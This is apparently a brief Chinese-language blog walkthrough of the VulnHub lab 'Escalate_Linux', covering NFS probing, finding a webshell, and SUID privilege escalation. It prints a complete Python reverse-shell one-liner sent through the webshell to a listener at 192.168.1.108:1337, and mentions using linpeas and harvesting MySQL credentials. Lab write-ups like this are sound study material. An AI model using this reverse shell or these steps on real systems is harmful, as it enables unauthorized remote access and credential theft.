{{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.
vulnhub >_ Escalate_Linux
Published on 09 Nov 2020
Escalate_Linux
先测试nfs
尝试利用ssh。但是权限不足。
新建用户user5 ,uid 1004
查看了一下,没什么有用的信息,但是user5有个拥有suid的程序script
往下进行80端口扫目录
扫到一个shell.php
看样子是个webshell
直接nc不好用,看看python
192.168.1.117/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.108",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
上传linpeas进行枚举
可以进mysql,发现所有u用户的凭证,也有很多其他提权方式,都是基础简单的,不再累诉,
SUID之一,home/user/shell
直接提权
